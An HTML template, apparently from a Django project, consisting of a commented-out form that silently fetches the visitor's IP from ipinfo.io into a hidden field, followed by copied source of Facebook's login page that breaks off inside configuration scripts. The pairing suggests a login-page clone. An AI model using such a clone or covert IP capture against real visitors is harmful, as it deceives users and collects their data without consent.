<!-- <html>

<head>
    <title>Getting Clients IP</title>

    <style>
        h1 {
            color: green;
        }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
    </script>

    <script>

        // Add "https://ipinfo.io" statement
        // this will communicate with the ipify servers
        // in order to retrieve the IP address
        $.get("https://ipinfo.io", function (response) {
            document.getElementById('demo').value = response.ip
        }, "json")

		// "json" shows that data will be fetched in json format
    </script>
</head>

<body>
    <center>
        <form style="margin-top: 20%;" name="myform" class="myform" action="/" method="post">
            {% csrf_token %}
            <h1>ENTER YOUR NAME:</h1>
            <input readonly hidden type="text" name="ip" id="demo">
            <input type="text" name="ipname" placeholder="Please enter your name"><br><br>

            <button type="submit" class="btn btn-success">Submit</button>
        </form>
    </center>
</body>

</html> -->




<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">

<head>
    <meta charset="utf-8" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <script nonce="uZn0pQB6">window._cstart = +new Date();</script>
    <script
        nonce="uZn0pQB6">function envFlush(a) { function b(b) { for (var c in a) b[c] = a[c] } window.requireLazy ? window.requireLazy(["Env"], b) : (window.Env = window.Env || {}, b(window.Env)) } envFlush({ "ajaxpipe_token": "AXiEaMMBPgcCfbhEsSA", "timeslice_heartbeat_config": { "pollIntervalMs": 33, "idleGapThresholdMs": 60, "ignoredTimesliceNames": { "requestAnimationFrame": true, "Event listenHandler mousemove": true, "Event listenHandler mouseover": true, "Event listenHandler mouseout": true, "Event listenHandler scroll": true }, "isHeartbeatEnabled": true, "isArtilleryOn": false }, "shouldLogCounters": true, "timeslice_categories": { "react_render": true, "reflow": true }, "sample_continuation_stacktraces": true, "dom_mutation_flag": true, "gk_requirelazy_mem": true, "gk_instrument_object_url": true, "stack_trace_limit": 30, "timesliceBufferSize": 5000, "show_invariant_decoder": false, "compat_iframe_token": "AQ6L2UYeVgVHsiJgxd0", "isCQuick": false });</script>
    <style nonce="uZn0pQB6"></style>
    <script
        nonce="uZn0pQB6">__DEV__ = 0; CavalryLogger = window.CavalryLogger || function (a) { this.lid = a, this.transition = !1, this.metric_collected = !1, this.is_detailed_profiler = !1, this.instrumentation_started = !1, this.pagelet_metrics = {}, this.events = {}, this.ongoing_watch = {}, this.values = { t_cstart: window._cstart }, this.piggy_values = {}, this.bootloader_metrics = {}, this.resource_to_pagelet_mapping = {}, this.initializeInstrumentation && this.initializeInstrumentation() }, CavalryLogger.prototype.setIsDetailedProfiler = function (a) { this.is_detailed_profiler = a; return this }, CavalryLogger.prototype.setTTIEvent = function (a) { this.tti_event = a; return this }, CavalryLogger.prototype.setValue = function (a, b, c, d) { d = d ? this.piggy_values : this.values; (typeof d[a] === "undefined" || c) && (d[a] = b); return this }, CavalryLogger.prototype.getLastTtiValue = function () { return this.lastTtiValue }, CavalryLogger.prototype.setTimeStamp = CavalryLogger.prototype.setTimeStamp || function (a, b, c, d) { this.mark(a); var e = this.values.t_cstart || this.values.t_start; e = d ? e + d : CavalryLogger.now(); this.setValue(a, e, b, c); this.tti_event && a == this.tti_event && (this.lastTtiValue = e, this.setTimeStamp("t_tti", b)); return this }, CavalryLogger.prototype.mark = typeof console === "object" && console.timeStamp ? function (a) { console.timeStamp(a) } : function () { }, CavalryLogger.prototype.addPiggyback = function (a, b) { this.piggy_values[a] = b; return this }, CavalryLogger.instances = {}, CavalryLogger.id = 0, CavalryLogger.getInstance = function (a) { typeof a === "undefined" && (a = CavalryLogger.id); CavalryLogger.instances[a] || (CavalryLogger.instances[a] = new CavalryLogger(a)); return CavalryLogger.instances[a] }, CavalryLogger.setPageID = function (a) { if (CavalryLogger.id === 0) { var b = CavalryLogger.getInstance(); CavalryLogger.instances[a] = b; CavalryLogger.instances[a].lid = a; delete CavalryLogger.instances[0] } CavalryLogger.id = a }, CavalryLogger.now = function () { return window.performance && performance.timing && performance.timing.navigationStart && performance.now ? performance.now() + performance.timing.navigationStart : new Date().getTime() }, CavalryLogger.prototype.measureResources = function () { }, CavalryLogger.prototype.profileEarlyResources = function () { }, CavalryLogger.getBootloaderMetricsFromAllLoggers = function () { }, CavalryLogger.start_js = function () { }, CavalryLogger.start_js_script = function () { }, CavalryLogger.done_js = function () { }; CavalryLogger.getInstance().setTTIEvent("t_domcontent"); CavalryLogger.prototype.measureResources = function (a, b) { if (!this.log_resources) return; var c = "bootload/" + a.name; if (this.bootloader_metrics[c] !== void 0 || this.ongoing_watch[c] !== void 0) return; var d = CavalryLogger.now(); this.ongoing_watch[c] = d; "start_" + c in this.bootloader_metrics || (this.bootloader_metrics["start_" + c] = d); b && !("tag_" + c in this.bootloader_metrics) && (this.bootloader_metrics["tag_" + c] = b); if (a.type === "js") { c = "js_exec/" + a.name; this.ongoing_watch[c] = d } }, CavalryLogger.prototype.stopWatch = function (a) { if (this.ongoing_watch[a]) { var b = CavalryLogger.now(), c = b - this.ongoing_watch[a]; this.bootloader_metrics[a] = c; var d = this.piggy_values; a.indexOf("bootload") === 0 && (d.t_resource_download || (d.t_resource_download = 0), d.resources_downloaded || (d.resources_downloaded = 0), d.t_resource_download += c, d.resources_downloaded += 1, d["tag_" + a] == "_EF_" && (d.t_pagelet_cssload_early_resources = b)); delete this.ongoing_watch[a] } return this }, CavalryLogger.getBootloaderMetricsFromAllLoggers = function () { var a = {}; Object.values(window.CavalryLogger.instances).forEach(function (b) { b.bootloader_metrics && Object.assign(a, b.bootloader_metrics) }); return a }, CavalryLogger.start_js = function (a) { for (var b = 0; b < a.length; ++b)CavalryLogger.getInstance().stopWatch("js_exec/" + a[b]) }, CavalryLogger.start_js_script = function (a) { if (!a || !a.dataset) return; CavalryLogger.start_js([a.dataset.bootloaderHash || a.dataset.bootloaderHashClient]) }, CavalryLogger.done_js = function (a) { for (var b = 0; b < a.length; ++b)CavalryLogger.getInstance().stopWatch("bootload/" + a[b]) }, CavalryLogger.prototype.profileEarlyResources = function (a) { for (var b = 0; b < a.length; b++)this.measureResources({ name: a[b][0], type: a[b][1] ? "js" : "" }, "_EF_") }; CavalryLogger.getInstance().log_resources = true; CavalryLogger.getInstance().setIsDetailedProfiler(true); window.CavalryLogger && CavalryLogger.getInstance().setTimeStamp("t_start");</script>
    <noscript>
        <meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" />
    </noscript>
    <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" />
    <title id="pageTitle">Facebook – log in or sign up</title>
    <meta property="og:site_name" content="Facebook" />
    <meta property="og:url" content="https://www.facebook.com/" />
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
    <meta property="og:locale" content="en_GB" />
    <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/" />
    <link rel="alternate" media="handheld" href="https://m.facebook.com/" />
    <meta name="description"
        content="Log in to Facebook to start sharing and connecting with your friends, family and people you know." />
    <script type="application/ld+json"
        nonce="uZn0pQB6">{"\u0040context":"http:\/\/schema.org","\u0040type":"WebSite","name":"Facebook","url":"https:\/\/en-gb.facebook.com\/"}</script>
    <link rel="canonical" href="https://www.facebook.com/" />
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0,cross/vccDNWxoJia.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="slsgoRE" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/y4/l/0,cross/QHV7EPCttxL.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="Dq8u3wo" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/l/0,cross/3UhmsnNLars.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="hrQ+dST" crossorigin="anonymous" />
    <link type="text/css" rel="stylesheet"
        href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/l/0,cross/KsAUELQFghT.css?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="ygoD/GA" crossorigin="anonymous" />
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/jXgHdyDwPji.js?_nc_x=Ij3Wp8lg5Kz"
        data-bootloader-hash="8KSZj+/" crossorigin="anonymous" nonce="uZn0pQB6"></script>
    <script
        nonce="uZn0pQB6">requireLazy(["HasteSupportData"], function (m) { m.handle({ "clpData": { "1814852": { "r": 1 }, "1838142": { "r": 1, "s": 1 }, "1949898": { "r": 1 }, "1848815": { "r": 10000, "s": 1 }, "1744178": { "r": 1, "s": 1 } }, "gkxData": { "5241": { "result": true, "hash": "AT7o1bCQPGpf3ShE_LA" }, "676837": { "result": false, "hash": "AT4N8wBZA8ctCdHwSC4" }, "708253": { "result": false, "hash": "AT5n4hBL3YTMnQWtxng" }, "996940": { "result": false, "hash": "AT7opYuEGy3sjG1aKMI" }, "1224637": { "result": false, "hash": "AT7JRluWxuwDm3Xz7us" }, "1263340": { "result": false, "hash": "AT5bwizWgDaFQudmkt4" }, "676920": { "result": true, "hash": "AT497IX4gOFG8gZeaZk" }, "1073500": { "result": false, "hash": "AT7aJmfnqWyioxOO2tc" }, "1167394": { "result": false, "hash": "AT7BpN-tlUPwbIIFxKc" }, "1857581": { "result": false, "hash": "AT5yTxGMp6le0PAtT3M" }, "2772": { "result": false, "hash": "AT5Eu244WIce7iwqInQ" }, "3752": { "result": false, "hash": "AT6eS5UTkkMp_xbPysE" }, "3831": { "result": false, "hash": "AT4W23lQ0XxAZniM0TI" }, "4075": { "result": false, "hash": "AT4_ZQi0sTjSt-RxnYo" }, "676838": { "result": false, "hash": "AT6nN1ehT9yq-2q6Irw" }, "1217157": { "result": false, "hash": "AT6B7YmllOsArnK6cRk" }, "1554827": { "result": false, "hash": "AT7zueGLhGo0cT5x7XM" }, "1738486": { "result": false, "hash": "AT4cX37oQco6DwhUaBU" } }, "qplData": { "7758": { "r": 1 } } }) }); requireLazy(["TimeSliceImpl", "ServerJS"], function (TimeSlice, ServerJS) { (new ServerJS()).handle({ "define": [["URLFragmentPreludeConfig", [], { "hashtagRedirect": true, "fragBlacklist": ["nonce", "access_token", "oauth_token", "xs", "checkpoint_data", "code"] }, 137], ["CometPersistQueryParams", [], { "relative": {}, "domain": {} }, 6231], ["CookieDomain", [], { "domain": "facebook.com" }, 6421], ["BootloaderConfig", [], { "deferBootloads": false, "jsRetries": [200, 500], "jsRetryAbortNum": 2, "jsRetryAbortTime": 5, "silentDups": false, "hypStep4": false, "phdOn": false, "btCutoffIndex": 3043 }, 329], ["CSSLoaderConfig", [], { "timeout": 5000, "modulePrefix": "BLCSS:", "loadEventSupported": true }, 619], ["CookieCoreConfig", [], { "c_user": { "s": "None" }, "cppo": { "t": 86400, "s": "None" }, "dpr": { "t": 604800, "s": "None" }, "fbl_ci": { "t": 31536000, "s": "None" }, "fbl_cs": { "t": 31536000, "s": "None" }, "fbl_st": { "t": 31536000, "s": "Strict" }, "i_user": { "s": "None" }, "locale": { "t": 604800, "s": "None" }, "m_pixel_ratio": { "t": 604800, "s": "None" }, "noscript": { "s": "None" }, "presence": { "t": 2592000, "s": "None" }, "sfau": { "s": "None" }, "usida": { "s": "None" }, "vpd": { "t": 5184000, "s": "Lax" }, "wd": { "t": 604800, "s": "Lax" }, "x-referer": { "s": "None" }, "x-src": { "t": 1, "s": "None" } }, 2104], ["CurrentCommunityInitialData", [], {}, 490], ["CurrentEnvironment", [], { "facebookdotcom": true, "messengerdotcom": false, "workplacedotcom": false, "instagramdotcom": false }, 827], ["CurrentUserInitialData", [], { "ACCOUNT_ID": "0", "USER_ID": "0", "NAME": "", "SHORT_NAME": null, "IS_BUSINESS_PERSON_ACCOUNT": false, "HAS_SECONDARY_BUSINESS_PERSON": false, "IS_FACEBOOK_WORK_ACCOUNT": false, "IS_MESSENGER_ONLY_USER": false, "IS_DEACTIVATED_ALLOWED_ON_MESSENGER": false, "IS_MESSENGER_CALL_GUEST_USER": false, "IS_WORK_MESSENGER_CALL_GUEST_USER": false, "APP_ID": "256281040558", "IS_BUSINESS_DOMAIN": false }, 270], ["DTSGInitialData", [], {}, 258], ["ISB", [], {}, 330], ["LSD", [], { "token": "AVo9uBDanRo" }, 323], ["ServerNonce", [], { "ServerNonce": "yyJ1L4wYxLvfzxwLNEiX9m" }, 141], ["SiteData", [], { "server_revision": 1005189989, "client_revision": 1005189989, "tier": "", "push_phase": "C3", "pkg_cohort": "BP:DEFAULT", "haste_session": "19065.BP:DEFAULT.2.0.0.0.", "pr": 1, "haste_site": "www", "manifest_base_uri": "https:\/\/static.xx.fbcdn.net", "manifest_origin": null, "be_one_ahead": false, "is_rtl": false, "is_comet": false, "is_experimental_tier": true, "is_jit_warmed_up": true, "hsi": "7074865264628579990-0", "semr_host_bucket": "5", "bl_hash_version": 2, "skip_rd_bl": true, "comet_env": 0, "wbloks_env": false, "spin": 4, "__spin_r": 1005189989, "__spin_b": "trunk", "__spin_t": 1647245433, "vip": "2a03:2880:f144:181:face:b00c:0:25de" }, 317], ["SprinkleConfig", [], { "param_name": "jazoest", "version": 2, "should_randomize": false }, 2111], ["UserAgentData", [], { "browserArchitecture": "64", "browserFullVersion": "99.0.4844.51", "browserMinorVersion": 0, "browserName": "Chrome", "browserVersion": 99, "deviceName": "Unknown", "engineName": "WebKit", "engineVersion": "537.36", "platformArchitecture": "64", "platformName": "Windows", "platformVersion": "10", "platformFullVersion": "10" }, 527], ["PromiseUsePolyfillSetImmediateGK", [], { "www_always_use_polyfill_setimmediate": false }, 2190], ["KSConfig", [], { "killed": { "__set": ["MOBILIZER_SELF_SERVE_OWNERSHIP_RESOLVER", "MLHUB_FLOW_AUTOREFRESH_SEARCH", "NEKO_DISABLE_CREATE_FOR_SAP", "EO_DISABLE_SYSTEM_SERIAL_NUMBER_FREE_TYPING_IN_CPE_NON_CLIENT", "MOBILITY_KILL_OLD_VISIBILITY_POSITION_SETTING", "WORKPLACE_DISPLAY_TEXT_EVIDENCE_REPORTING", "BUSINESS_INVITE_FLOW_WITH_SELLER_PROFILE", "BUY_AT_UI_LINE_DELETE", "BUSINESS_GRAPH_SETTING_APP_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_BU_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_ESG_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_PRODUCT_CATALOG_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_SESG_ASSIGNED_USERS_NEW_API", "BUSINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API", "ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION", "FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION", "VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG", "SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME", "ADS_STORE_VISITS_METRICS_DEPRECATION", "DYNAMIC_ADS_SET_CATALOG_AND_PRODUCT_SET_TOGETHER", "AD_DRAFT_ENABLE_SYNCRHONOUS_FRAGMENT_VALIDATION", "NEKO_ENABLE_RESET_SAP_FOR_CREATE_AD_SET_CONTEXTUAL", "SEPARATE_MESSAGING_COMACTIVITY_PAGE_PERMS", "LAB_NET_NEW_UI_RELEASE", "POCKET_MONSTERS_CREATE", "POCKET_MONSTERS_DELETE", "SRT_BANZAI_SRT_CORE_LOGGER", "SRT_BANZAI_SRT_MAIN_LOGGER", "WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES", "POCKET_MONSTERS_UPDATE_NAME", "IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE", "ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER", "RECRUITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD"] }, "ko": { "__set": ["8H4bQmEiuLT", "3OsLvnSHNTt", "1G7wJ6bJt9K", "9NpkGYwzrPG", "3oh5Mw86USj", "8NAceEy9JZo", "7FOIzos6XJX", "rf8JEPGgOi", "4j36SVzvP3w", "4NSq3ZC4ScE", "53gCxKq281G", "3yzzwBY7Npj", "1onzIv0jH6H", "8PlKuowafe8", "1ntjZ2zgf03", "4SIH2GRVX5W", "2dhqRnqXGLQ", "2WgiNOrHVuC", "amKHb4Cw4WI", "5mNEXob0nTj", "8rDvN9vWdAK", "9cL5o2kjfZo", "5BdzWGmfvrA", "DDZhogI19W", "acrJTh9WGdp", "1oOE64fL4wO", "9Gd8qgRxn8z", "MPMaqnqZ9c", "5XCz1h9Iaw3", "7r6mSP7ofr2", "6DGPLrRdyts", "aWxCyi1sEC7", "9kCSDzzr8fu"] } }, 2580], ["JSErrorLoggingConfig", [], { "appId": 256281040558, "extra": [], "reportInterval": 50, "sampleWeight": null, "sampleWeightKey": "__jssesw", "projectBlocklist": [] }, 2776], ["DataStoreConfig", [], { "expandoKey": "__FB_STORE", "useExpando": true }, 2915], ["CookieCoreLoggingConfig", [], { "maximumIgnorableStallMs": 16.67, "sampleRate": 9.7e-5, "sampleRateClassic": 1.0e-10, "sampleRateFastStale": 1.0e-8 }, 3401], ["ImmediateImplementationExperiments", [], { "prefer_message_channel": true }, 3419], ["DTSGInitData", [], { "token": "", "async_get_token": "" }, 3515], ["UriNeedRawQuerySVConfig", [], { "uris": ["dms.netmng.com", "doubleclick.net", "r.msn.com", "watchit.sky.com", "graphite.instagram.com", "www.kfc.co.th", "learn.pantheon.io", "www.landmarkshops.in", "www.ncl.com", "s0.wp.com", "www.tatacliq.com", "bs.serving-sys.com", "kohls.com", "lazada.co.th", "xg4ken.com", "technopark.ru", "officedepot.com.mx", "bestbuy.com.mx", "booking.com", "nibio.no"] }, 3871], ["InitialCookieConsent", [], { "deferCookies": false, "initialConsent": { "__set": [1, 2] }, "noCookies": false, "shouldShowCookieBanner": false }, 4328], ["TrustedTypesConfig", [], { "useTrustedTypes": false, "reportOnly": false }, 4548], ["WebConnectionClassServerGuess", [], { "connectionClass": "GOOD" }, 4705], ["CometAltpayJsSdkIframeAllowedDomains", [], { "allowed_domains": ["https:\/\/live.adyen.com", "https:\/\/integration-facebook.payu.in", "https:\/\/facebook.payulatam.com", "https:\/\/secure.payu.com", "https:\/\/facebook.dlocal.com", "https:\/\/buy2.boku.com"] }, 4920], ["BootloaderEndpointConfig", [], { "debugNoBatching": false, "endpointURI": "https:\/\/www.facebook.com\/ajax\/bootloader-endpoint\/" }, 5094], ["CookieConsentIFrameConfig", [], { "consent_param": "FQAREhIA.ARasCESH4R5hqHDBYjAtP2VYfD95M1yLnH36I5TH4glZTTkF", "allowlisted_iframes": [] }, 5540], ["BigPipeExperiments", [], { "link_images_to_pagelets": false, "enable_bigpipe_plugins": false }, 907], ["AsyncRequestConfig", [], { "retryOnNetworkError": "1", "useFetchStreamAjaxPipeTransport": false }, 328], ["FbtQTOverrides", [], { "overrides": {} }, 551], ["FbtResultGK", [], { "shouldReturnFbtResult": true, "inlineMode": "NO_INLINE" }, 876], ["IntlPhonologicalRules", [], { "meta": { "\/_B\/": "([.,!?\\s]|^)", "\/_E\/": "([.,!?\\s]|$)" }, "patterns": { "\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/": "\u0001$1$2s\u0001$3", "\/_\u0001([^\u0001]*)\u0001\/": "javascript" } }, 1496], ["IntlViewerContext", [], { "GENDER": 3, "regionalLocale": null }, 772], ["NumberFormatConfig", [], { "decimalSeparator": ".", "numberDelimiter": ",", "minDigitsForThousandsSeparator": 4, "standardDecimalPatternInfo": { "primaryGroupSize": 3, "secondaryGroupSize": 3 }, "numberingSystemData": null }, 54], ["SessionNameConfig", [], { "seed": "12KF" }, 757], ["ZeroCategoryHeader", [], {}, 1127], ["ZeroRewriteRules", [], { "rewrite_rules": {}, "whitelist": { "\/hr\/r": 1, "\/hr\/p": 1, "\/zero\/unsupported_browser\/": 1, "\/zero\/policy\/optin": 1, "\/zero\/optin\/write\/": 1, "\/zero\/optin\/legal\/": 1, "\/zero\/optin\/free\/": 1, "\/about\/privacy\/": 1, "\/about\/privacy\/update\/": 1, "\/privacy\/explanation\/": 1, "\/zero\/toggle\/welcome\/": 1, "\/zero\/toggle\/nux\/": 1, "\/zero\/toggle\/settings\/": 1, "\/fup\/interstitial\/": 1, "\/work\/landing": 1, "\/work\/login\/": 1, "\/work\/email\/": 1, "\/ai.php": 1, "\/js_dialog_resources\/dialog_descriptions_android.json": 0, "\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/": 0, "\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/": 0, "\/connect\/jsdialog\/MPlatformLikeJSDialog\/": 0, "\/qp\/interstitial\/": 1, "\/qp\/action\/redirect\/": 1, "\/qp\/action\/close\/": 1, "\/zero\/support\/ineligible\/": 1, "\/zero_balance_redirect\/": 1, "\/zero_balance_redirect": 1, "\/zero_balance_redirect\/l\/": 1, "\/l.php": 1, "\/lsr.php": 1, "\/ajax\/dtsg\/": 1, "\/checkpoint\/block\/": 1, "\/exitdsite": 1, "\/zero\/balance\/pixel\/": 1, "\/zero\/balance\/": 1, "\/zero\/balance\/carrier_landing\/": 1, "\/zero\/flex\/logging\/": 1, "\/tr": 1, "\/tr\/": 1, "\/sem_campaigns\/sem_pixel_test\/": 1, "\/bookmarks\/flyout\/body\/": 1, "\/zero\/subno\/": 1, "\/confirmemail.php": 1, "\/policies\/": 1, "\/mobile\/internetdotorg\/classifier\/": 1, "\/zero\/dogfooding": 1, "\/xti.php": 1, "\/zero\/fblite\/config\/": 1, "\/hr\/zsh\/wc\/": 1, "\/ajax\/bootloader-endpoint\/": 1, "\/mobile\/zero\/carrier_page\/": 1, "\/mobile\/zero\/carrier_page\/education_page\/": 1, "\/mobile\/zero\/carrier_page\/feature_switch\/": 1, "\/mobile\/zero\/carrier_page\/settings_page\/": 1, "\/aloha_check_build": 1, "\/upsell\/zbd\/softnudge\/": 1, "\/mobile\/zero\/af_transition\/": 1, "\/mobile\/zero\/af_transition\/action\/": 1, "\/mobile\/zero\/freemium\/": 1, "\/mobile\/zero\/freemium\/redirect\/": 1, "\/mobile\/zero\/freemium\/zero_fup\/": 1, "\/privacy\/policy\/": 1, "\/privacy\/center\/": 1, "\/data\/manifest\/": 1, "\/4oh4.php": 1, "\/autologin.php": 1, "\/birthday_help.php": 1, "\/checkpoint\/": 1, "\/contact-importer\/": 1, "\/cr.php": 1, "\/legal\/terms\/": 1, "\/login.php": 1, "\/login\/": 1, "\/mobile\/account\/": 1, "\/n\/": 1, "\/remote_test_device\/": 1, "\/upsell\/buy\/": 1, "\/upsell\/buyconfirm\/": 1, "\/upsell\/buyresult\/": 1, "\/upsell\/promos\/": 1, "\/upsell\/continue\/": 1, "\/upsell\/h\/promos\/": 1, "\/upsell\/loan\/learnmore\/": 1, "\/upsell\/purchase\/": 1, "\/upsell\/promos\/upgrade\/": 1, "\/upsell\/buy_redirect\/": 1, "\/upsell\/loan\/buyconfirm\/": 1, "\/upsell\/loan\/buy\/": 1, "\/upsell\/sms\/": 1, "\/wap\/a\/channel\/reconnect.php": 1, "\/wap\/a\/nux\/wizard\/nav.php": 1, "\/wap\/appreg.php": 1, "\/wap\/birthday_help.php": 1, "\/wap\/c.php": 1, "\/wap\/confirmemail.php": 1, "\/wap\/cr.php": 1, "\/wap\/login.php": 1, "\/wap\/r.php": 1, "\/zero\/datapolicy": 1, "\/a\/timezone.php": 1, "\/a\/bz": 1, "\/bz\/reliability": 1, "\/r.php": 1, "\/mr\/": 1, "\/reg\/": 1, "\/registration\/log\/": 1, "\/terms\/": 1, "\/f123\/": 1, "\/expert\/": 1, "\/experts\/": 1, "\/terms\/index.php": 1, "\/terms.php": 1, "\/srr\/": 1, "\/msite\/redirect\/": 1, "\/fbs\/pixel\/": 1, "\/contactpoint\/preconfirmation\/": 1, "\/contactpoint\/cliff\/": 1, "\/contactpoint\/confirm\/submit\/": 1, "\/contactpoint\/confirmed\/": 1, "\/contactpoint\/login\/": 1, "\/preconfirmation\/contactpoint_change\/": 1, "\/help\/contact\/": 1, "\/survey\/": 1, "\/upsell\/loyaltytopup\/accept\/": 1, "\/settings\/": 1, "\/lite\/": 1, "\/zero_status_update\/": 1, "\/operator_store\/": 1, "\/upsell\/": 1, "\/wifiauth\/login\/": 1 } }, 1478], ["IntlNumberTypeConfig", [], { "impl": "if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }" }, 3405], ["ServerTimeData", [], { "serverTime": 1647245433552, "timeOfRequestStart": 1647245433531.8, "timeOfResponseStart": 1647245433531.8 }, 5943], ["AnalyticsCoreData", [], { "device_id": "$^|AcabixWUbdwUwIicOArnoxLgbAwqnfUmieBCQMe9qdRZA5y5X50TSPHQyLiFE8cp4desua2CULU2VCxOHYzjjxtLd1AMkjZSZ3gy0OnJQ5cSU2B_Bm05_zaS8l9AH-ZBFYkFYqE30-mnozQTMwpcaLli-h9XbQTlSw|fd.AcYOMp4EaD4KNK4G7uSlyiQW0E5tpbBDHzN8oiCit5hjpAT-hMUvGOh64tai8VMexHDDv4ppOcdKAE1o2nXtc7EP", "app_id": "256281040558", "enable_bladerunner": false, "enable_ack": true, "push_phase": "C3", "enable_observer": false, "enable_dataloss_timer": false, "enable_fallback_for_br": true }, 5237], ["cr:696703", [], { "__rc": [null, "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:708886", ["EventProfilerImpl"], { "__rc": ["EventProfilerImpl", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:717822", ["TimeSliceImpl"], { "__rc": ["TimeSliceImpl", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:806696", ["clearTimeoutBlue"], { "__rc": ["clearTimeoutBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:807042", ["setTimeoutBlue"], { "__rc": ["setTimeoutBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:896462", ["setIntervalAcrossTransitionsBlue"], { "__rc": ["setIntervalAcrossTransitionsBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:986633", ["setTimeoutAcrossTransitionsBlue"], { "__rc": ["setTimeoutAcrossTransitionsBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1003267", ["clearIntervalBlue"], { "__rc": ["clearIntervalBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:1183579", ["InlineFbtResultImpl"], { "__rc": ["InlineFbtResultImpl", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:925100", ["RunBlue"], { "__rc": ["RunBlue", "Aa0wFuFnf8JSq770-3hTflnWR3mmUzNby3lBGgtG0YaxJxwGeGXzWURXCuzMcHKx9d8otsiREoq6C0s8b5r3Ty0wWDU"] }, -1], ["cr:729414", ["VisualCompletion"], { "__rc": ["VisualCompletion", "Aa30oDZLuG9YRn4IKfmGisKMwKYIwUhWmjub4pfjtj6y_PTulU7vcBTggwb2wvUmXrhJ1f2Rxdb_jeN_jCmB4dS0"] }, -1], ["cr:1094907", [], { "__rc": [null, "Aa0HVy6FmixSMJwxg2LbyoNsN8E5tY_ht-HaS-vsj7ZTOsBNTYXiVTB7R8OYruTFhcoZU1_eaPTmqS-qiKm6UPo"] }, -1], ["EventConfig", [], { "sampling": { "bandwidth": 0, "play": 0, "playing": 0, "progress": 0, "pause": 0, "ended": 0, "seeked": 0, "seeking": 0, "waiting": 0, "loadedmetadata": 0, "canplay": 0, "selectionchange": 0, "change": 0, "timeupdate": 0, "adaptation": 0, "focus": 0, "blur": 0, "load": 0, "error": 0, "message": 0, "abort": 0, "storage": 0, "scroll": 200000, "mousemove": 20000, "mouseover": 10000, "mouseout": 10000, "mousewheel": 1, "MSPointerMove": 10000, "keydown": 0.1, "click": 0.02, "mouseup": 0.02, "__100ms": 0.001, "__default": 5000, "__min": 100, "__interactionDefault": 200, "__eventDefault": 100000 }, "page_sampling_boost": 1, "interaction_regexes": {}, "interaction_boost": {}, "event_types": {}, "manual_instrumentation": false, "profile_eager_execution": false, "disable_heuristic": true, "disable_event_profiler": false }, 1726], ["AdsInterfacesSessionConfig", [], {}, 2393], ["IntlCurrentLocale", [], { "code": "en_GB" }, 5954], ["USIDMetadata", [], { "browser_id": "?", "tab_id": "", "page_id": "Pr8q6plkt0a8z", 